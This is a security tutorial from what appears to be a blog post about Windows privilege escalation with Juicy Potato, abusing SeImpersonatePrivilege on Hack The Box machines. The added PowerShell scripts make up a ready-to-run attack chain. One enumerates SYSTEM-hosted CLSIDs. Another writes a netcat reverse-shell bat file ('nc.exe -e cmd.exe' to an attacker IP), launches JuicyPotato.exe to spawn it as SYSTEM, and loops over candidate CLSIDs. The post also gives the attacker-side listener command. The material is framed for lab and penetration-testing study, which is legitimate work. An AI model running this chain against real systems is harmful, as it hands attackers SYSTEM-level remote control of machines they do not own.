WINDOWS PRIVILEGE ESCALATION

Impersonating Privileges with Juicy Potato

Nairuz Abulhul, published in R3d Buck3T · 5 min read · Mar 22, 2021


Windows Privilege Escalation with SeImpersonatePrivilege and SeAssignPrimaryTokenPrivilege


Today, I am going to talk about a Windows privilege escalation tool called Juicy Potato. In the past, I used it on the older Hack The Box machines Bounty, Jeeves, and Conceal to escalate my privileges from a local user to Administrator. 🔥

Juicy Potato is a local privilege escalation tool created by Andrea Pierini and Giuseppe Trotta to exploit Windows service accounts’ impersonation privileges.

The tool abuses SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege, if either is held by the current token, to elevate to NT AUTHORITY\SYSTEM. It coaxes a COM server that runs as SYSTEM into authenticating (NTLM) to a listener Juicy Potato opens on the local machine, completes that authentication to obtain an impersonation token for SYSTEM, and then spawns a process with it: CreateProcessWithTokenW when SeImpersonatePrivilege is available, CreateProcessAsUser when SeAssignPrimaryTokenPrivilege is. By default these privileges are granted to LOCAL SERVICE, NETWORK SERVICE, SYSTEM and members of the local Administrators group, which is why they turn up on service accounts rather than on ordinary users.

If the machine runs IIS or SQL Server, the IIS application pool identities and the SQL Server service account hold SeImpersonatePrivilege by default, so a web shell on IIS or command execution through SQL Server usually lands with the privilege already in place.

🔧$_Attack_Requirements :

There are a few requirements for Juicy Potato to work:

1- A user account, usually a service account, whose token holds SeImpersonatePrivilege and/or SeAssignPrimaryTokenPrivilege. Check with whoami /priv; the privilege only has to be present on the token (a Disabled state still counts, since a process can enable a privilege it already holds).

2- A COM server, identified by its CLSID, that runs as SYSTEM and can be activated by the current user. The authors of Juicy Potato compiled lists of CLSIDs that work on different Windows versions — http://ohpe.it/juicy-potato/CLSID/.

📎A COM server is an executable (EXE or DLL) that implements a set of COM objects. Windows components are implemented as COM objects and follow standard COM rules to communicate with one another. COM servers are registered in the Registry and have a Class ID (CLSID) and an APPID — winaero

📝 CLSID is a globally unique identifier that identifies a COM object.

In all of the machines I used this tool on, I found that the CLSIDs of the wuauserv, WSearch, XblGameSave and BITS services (the COM components hosted by those services) reliably escalated privileges to NT AUTHORITY\SYSTEM.

  • Wuauserv for Windows Updates
  • WSearch for Windows Search
  • XblGameSave for Sync and Upload Xbox Live Save Games
  • BITS (Background Intelligent Transfer Service) for uploading and downloading files from/to HTTP web servers and SMB file shares.

3- A local port (-l) on the compromised host on which Juicy Potato itself listens for the COM server's connection.

4- The IP address of the RPC server the COM component connects back to (-k). Juicy Potato defaults this to 127.0.0.1, because the listener runs on the compromised host itself; the attacker's own IP address appears only in the reverse-shell payload, not here.

5- The program to launch as SYSTEM (-p), with optional arguments (-a): a stand-alone netcat binary, an msfvenom reverse shell, or a script that starts one.

$_Affected_Windows_Versions

  • Windows_10_Enterprise
  • Windows_10_Pro
  • Windows_7_Enterprise
  • Windows_8.1_Enterprise
  • Windows_Server_2008_R2_Enterprise
  • Windows_Server_2012_Datacenter

📌 Juicy Potato does not work on Windows Server 2019 or on Windows 10 version 1809 and later; Microsoft changed the DCOM activation behaviour the trick depends on in those builds.

However, there is another technique called PrintSpoofer, introduced by itm4n, that abuses the same privileges on those versions: https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/ . I will go over it in another tutorial 😃

😈$_Escalation_Demo

For the demo, I am going to run Juicy Potato on the Jeeves machine. As the screenshot below shows, we have a shell running as kohsuke, and SeImpersonatePrivilege is enabled.

To escalate, we need to upload the Juicy Potato executable to the compromised machine. A compiled version is available on the tool's GitHub releases page: https://github.com/ohpe/juicy-potato/releases.

To run the tool, we need a port number for the COM server and a valid CLSID. You can either pick one from the list the tool authors provide for your version of Windows, or extract the CLSIDs of the current system with the PowerShell script shown in the screenshot (the authors ship one for this purpose, GetCLSID.ps1, in the repository). Save the PowerShell code to a file, run it, and save the output to a file so you can work through the candidates.
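The following script is an added example, not the authors' GetCLSID.ps1 or code from the original post. It does the same job from first principles: a COM server whose AppID carries a LocalService value is hosted inside that Windows service, so if the service runs as LocalSystem the COM server runs as SYSTEM. The script walks HKCR\CLSID, follows each AppID, cross-references the hosting service against Win32_Service, and writes the candidates to a CSV; the output path and the function name are my choices.

```powershell
# Added example (not the authors' GetCLSID.ps1): enumerate CLSIDs whose COM
# server is hosted by a Windows service running as LocalSystem. Those are the
# candidates for Juicy Potato's -c argument on this particular build.
function Get-SystemComClsid {
    # HKCR is not a default PowerShell drive; map it so CLSID and AppID can be walked.
    if (-not (Get-PSDrive -Name HKCR -ErrorAction SilentlyContinue)) {
        New-PSDrive -Name HKCR -PSProvider Registry -Root HKEY_CLASSES_ROOT | Out-Null
    }

    # Services that run as SYSTEM, keyed by lower-cased service name.
    $systemServices = @{}
    Get-CimInstance -ClassName Win32_Service |
        Where-Object { $_.StartName -eq 'LocalSystem' } |
        ForEach-Object { $systemServices[$_.Name.ToLower()] = $_ }

    foreach ($clsidKey in Get-ChildItem -Path 'HKCR:\CLSID' -ErrorAction SilentlyContinue) {
        # The AppID value on a CLSID key points at HKCR\AppID\{...}, which holds the
        # activation settings (LocalService = hosted by that service, RunAs = identity).
        $appId = (Get-ItemProperty -Path $clsidKey.PSPath -Name AppID -ErrorAction SilentlyContinue).AppID
        if (-not $appId) { continue }

        $appProps = Get-ItemProperty -Path "HKCR:\AppID\$appId" -ErrorAction SilentlyContinue
        if (-not $appProps -or -not $appProps.LocalService) { continue }   # not service-hosted

        $svc = $systemServices[$appProps.LocalService.ToLower()]
        if (-not $svc) { continue }                                         # hosted, but not as SYSTEM

        [pscustomobject]@{
            CLSID        = $clsidKey.PSChildName
            AppID        = $appId
            LocalService = $appProps.LocalService
            RunAs        = $appProps.RunAs      # usually empty; 'Interactive User' would NOT yield SYSTEM
            State        = $svc.State
        }
    }
}

# Save the full list, then show the services the article found reliable.
$clsids = Get-SystemComClsid
$clsids | Export-Csv -Path "$env:TEMP\clsids.csv" -NoTypeInformation
$clsids | Where-Object { $_.LocalService -in 'wuauserv', 'WSearch', 'XblGameSave', 'BITS' } |
    Format-Table -AutoSize
```

The list tells you which COM servers would run as SYSTEM, not which ones the current user is allowed to activate, so expect some entries to fail when you feed them to the tool; that is why the write-up ends up trying several.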

Upload netcat to the compromised machine and create a .bat file that uses it to execute a reverse shell (the screenshot shows the bat file for executing a reverse shell with netcat).

Run the tool and pass it a local COM listener port (-l), a CLSID from the extracted list (-c, braces included), the path to the bat script (-p), and the CreateProcess variant to use (-t: t for CreateProcessWithTokenW, u for CreateProcessAsUser, * to try both). The -l port is where Juicy Potato itself listens on the victim for the COM server; the write-up reuses the reverse-shell port number, but any free local port works since the two listeners are on different hosts.

Open another tab on the attacker machine and start the netcat listener on the port chosen in the bat file. In this case, it is 9003.

As we can see, a process was created through the selected CLSID, and it runs with SYSTEM privileges 😃

📌Note: you might have to try multiple CLSIDs before one produces the SYSTEM process. Juicy Potato's -z switch only tests a CLSID and prints the user of the token it obtains, without launching anything, which makes it easy to loop over a list of candidates first.
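The whole procedure, typed into the PowerShell shell on the victim, as an added example that is not part of the original post: it checks the precondition from whoami /priv, writes the netcat bat file, picks the -t mode from the privileges actually held, and runs Juicy Potato. The function names, the working directory, and the assumption that JuicyPotato.exe and nc.exe are already uploaded are mine; no CLSID is hard-coded, you pass one from the extraction step (the GUID in the comment is only the BITS default the tool falls back to when -c is omitted). The -z loop relies on the tool's own test switch described above.

```powershell
# Added example, not the article's own commands. Assumes JuicyPotato.exe and
# nc.exe are already in $WorkDir on the victim and that a netcat listener is
# waiting on $AttackerIp:$Port (start it on the attacker box first).
function Invoke-JuicyPotato {
    param(
        [Parameter(Mandatory)] [string] $Clsid,       # braces included, e.g. the tool's BITS default '{4991d34b-80a1-4291-83b6-3328366b9097}'
        [Parameter(Mandatory)] [string] $AttackerIp,
        [int]    $Port    = 9003,                     # reverse-shell port on the attacker box
        [int]    $ComPort = 9003,                     # local COM listener port (-l); any free port works
        [string] $WorkDir = "$env:USERPROFILE\Desktop"
    )

    # 1. Precondition: the token must hold one of the two privileges. whoami /priv
    #    lists held privileges even when their State is Disabled; that is enough,
    #    because a process can enable a privilege it already holds.
    $privs = whoami /priv
    $canImpersonate = [bool]($privs -match 'SeImpersonatePrivilege')
    $canAssignToken = [bool]($privs -match 'SeAssignPrimaryTokenPrivilege')
    if (-not ($canImpersonate -or $canAssignToken)) {
        throw 'Token holds neither SeImpersonatePrivilege nor SeAssignPrimaryTokenPrivilege; Juicy Potato cannot help here.'
    }

    # 2. Payload: a .bat that connects back with netcat. Juicy Potato launches
    #    this file as NT AUTHORITY\SYSTEM, so the shell that comes back is SYSTEM.
    $bat = Join-Path $WorkDir 'rev.bat'
    @"
@echo off
"$WorkDir\nc.exe" -e cmd.exe $AttackerIp $Port
"@ | Set-Content -Path $bat -Encoding Ascii

    # 3. Pick the CreateProcess variant (-t) from the privileges we actually have:
    #      t = CreateProcessWithTokenW (needs SeImpersonatePrivilege)
    #      u = CreateProcessAsUser     (needs SeAssignPrimaryTokenPrivilege)
    #      * = try both
    $mode = 'u'
    if ($canImpersonate) { $mode = 't' }
    if ($canImpersonate -and $canAssignToken) { $mode = '*' }

    # 4. Launch. -l is where Juicy Potato itself listens on this host for the SYSTEM
    #    COM server to connect; it is unrelated to the reverse-shell port and is
    #    reused here only to mirror the write-up.
    & (Join-Path $WorkDir 'JuicyPotato.exe') -t $mode -p $bat -l $ComPort -c $Clsid
}

# Optional pre-flight: try each candidate CLSID with -z, which only tests the
# CLSID and prints the user of the token obtained, without spawning anything.
function Test-JuicyPotatoClsid {
    param(
        [Parameter(Mandatory)] [string[]] $Clsid,
        [int]    $ComPort = 9003,
        [string] $WorkDir = "$env:USERPROFILE\Desktop"
    )
    $exe = Join-Path $WorkDir 'JuicyPotato.exe'
    foreach ($c in $Clsid) {
        $out = & $exe -z -l $ComPort -c $c 2>&1 | Out-String
        [pscustomobject]@{
            CLSID  = $c
            System = [bool]($out -match 'NT AUTHORITY\\SYSTEM')
        }
    }
}

# Usage on the victim (clsids.txt holds one {CLSID} per line from the extraction step):
#   Test-JuicyPotatoClsid -Clsid (Get-Content .\clsids.txt) | Where-Object System
#   Invoke-JuicyPotato -Clsid '<a CLSID that tested as SYSTEM>' -AttackerIp '<your ip>'
```

Before calling Invoke-JuicyPotato, start the listener on the attacker box with `nc -lvnp 9003`; the bat file connects outbound to it, so the victim's firewall only needs to allow the outbound connection, while the -l port is bound on 127.0.0.1 and never leaves the host.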

That’s all for today 😃. Thanks for stopping by …

💡Quick Cheat sheet for all of the used commands in this tutorial at Notion — R3b-buck3t

📚$_Resources:

https://itm4n.github.io/printspoofer-abusing-impersonate-privileges

https://winaero.com/fix-for-event-id-error-10016-dcom-server-not-having-local-activation-permissions-for-pcnameusername-sid
